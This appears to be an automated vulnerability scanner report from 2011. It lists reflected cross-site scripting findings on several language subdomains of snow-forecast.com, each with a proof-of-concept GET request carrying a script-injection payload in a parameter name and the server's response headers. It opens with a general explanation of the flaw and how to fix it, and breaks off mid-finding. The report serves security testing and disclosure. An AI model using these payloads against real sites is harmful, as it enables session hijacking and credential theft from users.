Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://cz.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a7a"><script>alert(1)</script>a7bfa3d9337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64a7a"><script>alert(1)</script>a7bfa3d9337=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c49462ceded29336506baa333cc5daca" X-Runtime: 49 Content-Length: 24431 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21208"><script>alert(1)</script>039b6a685b6 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'21208"><script>alert(1)</script>039b6a685b6 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1644f7643d4e14fcbbdc301f0742c4f5" X-Runtime: 69 Content-Length: 18310 Set-Cookie: sfcsid=9194634b97339418d9f2c5b83fcf4d84; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8484b"><script>alert(1)</script>96d3ccf0e21 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E8484b"><script>alert(1)</script>96d3ccf0e21 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "e84b0854eb12d518104cb443a8e64d4f" X-Runtime: 365 Content-Length: 19382 Set-Cookie: sfcsid=2b641f1cfc92107e3aab0c3cb6d51280; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.4. http://cz.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b95c"><script>alert(1)</script>5fb4bdd990b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?6b95c"><script>alert(1)</script>5fb4bdd990b=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4d079e54704b31cf07ef64d024cb39d7" X-Runtime: 56 Content-Length: 18297 Set-Cookie: sfcsid=783ef82bc593dae2b76d2ce4f01a8524; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.5. http://cz.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda15"><script>alert(1)</script>33e1cbb6f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?bda15"><script>alert(1)</script>33e1cbb6f93=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "49314cee0ac5223ee825ff8e86497923" X-Runtime: 62 Content-Length: 27871 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.6. http://cz.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cz.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8f5"><script>alert(1)</script>3dd76f3b11b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?be8f5"><script>alert(1)</script>3dd76f3b11b=1 HTTP/1.1 Host: cz.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c182974d841c4c56d147c62d97b7e1f3" X-Runtime: 794 Content-Length: 42584 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:11:58 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.7. http://de.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbac"><script>alert(1)</script>95e84bca782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?fbbac"><script>alert(1)</script>95e84bca782=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:11:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f432ab52bfe493d159f2628628f45908" X-Runtime: 161 Content-Length: 24250 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe82"><script>alert(1)</script>a7a85dea370 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'bfe82"><script>alert(1)</script>a7a85dea370 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "db1ae35e6265667fd2eb94a26d4c6dac" X-Runtime: 57 Content-Length: 18134 Set-Cookie: sfcsid=5b753bfae8b07ad1ccf13ed46d2338b3; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b2b"><script>alert(1)</script>1e751c12c95 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E53b2b"><script>alert(1)</script>1e751c12c95 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "fc873d4e8b7694a22a12a79a5aaa5b1e" X-Runtime: 58 Content-Length: 19193 Set-Cookie: sfcsid=9276811bc649b9ba2d38c17e505cfdbc; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.10. http://de.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5c9d"><script>alert(1)</script>2c618ed1318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?b5c9d"><script>alert(1)</script>2c618ed1318=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "727cde662c4f523eaaa6a44a1fda4981" X-Runtime: 77 Content-Length: 18120 Set-Cookie: sfcsid=b6bcd058030d4436da0d1e82fb55c657; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.11. http://de.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a224c"><script>alert(1)</script>6575e373dcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?a224c"><script>alert(1)</script>6575e373dcc=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "cd6798c9e587626ff41ab5b32451775d" X-Runtime: 460 Content-Length: 27682 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.12. http://de.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://de.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e817b"><script>alert(1)</script>34efc92cee8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?e817b"><script>alert(1)</script>34efc92cee8=1 HTTP/1.1 Host: de.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "7f54090762abf3112c11e2452075d762" X-Runtime: 141 Content-Length: 42304 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:02 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Courchevel Wetter ...[SNIP]... <a href="http://hu.snow-forecast.com/resorts/Courchevel?e817b"><script>alert(1)</script>34efc92cee8=1"> ...[SNIP]...
1.13. http://es.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975dd"><script>alert(1)</script>973d6f889b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?975dd"><script>alert(1)</script>973d6f889b=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "9b29893ee54817faf668ff72d0baa08f" X-Runtime: 101 Content-Length: 24327 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 773ec"><script>alert(1)</script>4abeccce8b7 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'773ec"><script>alert(1)</script>4abeccce8b7 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d2a6954b7a10249e66a0f0fa066cfb53" X-Runtime: 57 Content-Length: 18247 Set-Cookie: sfcsid=9c88d77d2cd1a29c3e28aafa49f30ee0; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41142"><script>alert(1)</script>e6400709715 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E41142"><script>alert(1)</script>e6400709715 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4cac985e36425073200ee4588f4c7187" X-Runtime: 92 Content-Length: 19295 Set-Cookie: sfcsid=d6e0823ae17b18f3b7450187a984bd59; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.16. http://es.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eced"><script>alert(1)</script>64fe131412b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?4eced"><script>alert(1)</script>64fe131412b=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "e1240e1ffb58eb7710b57da98aa91a95" X-Runtime: 67 Content-Length: 18222 Set-Cookie: sfcsid=b3fd6708954d5e7207d90d6addcbf1e8; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.17. http://es.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192d8"><script>alert(1)</script>84ea65d4895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?192d8"><script>alert(1)</script>84ea65d4895=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:21 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "53f297749ceed95abf16ecfdfc0bfc6a" X-Runtime: 547 Content-Length: 27890 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.18. http://es.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6adb5"><script>alert(1)</script>46c246d5ba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?6adb5"><script>alert(1)</script>46c246d5ba3=1 HTTP/1.1 Host: es.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1e1b929cd053412211ee68d7cc7ea25c" X-Runtime: 142 Content-Length: 42639 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:20 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.19. http://fr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f768"><script>alert(1)</script>81b91734d9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?2f768"><script>alert(1)</script>81b91734d9d=1 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "dc78481bda8beb47ff1f02061ae68dd8" X-Runtime: 67 Content-Length: 24444 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c215"><script>alert(1)</script>cf206e690ff was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'8c215"><script>alert(1)</script>cf206e690ff HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "c86ecaecd4fc4779c65ff7a2c914a297" X-Runtime: 59 Content-Length: 18244 Set-Cookie: sfcsid=02657e17ffdc5eb930cd62c9d1aacf4c; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396a0"><script>alert(1)</script>fc182e50300 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E396a0"><script>alert(1)</script>fc182e50300 HTTP/1.1 Host: fr.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "51be0bfa877162fc20469dae7061b47e" X-Runtime: 64 Content-Length: 19348 Set-Cookie: sfcsid=b0eaac30c36577861504f451b838b266; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.22. http://fr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd33"><script>alert(1)</script>d7988552faf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
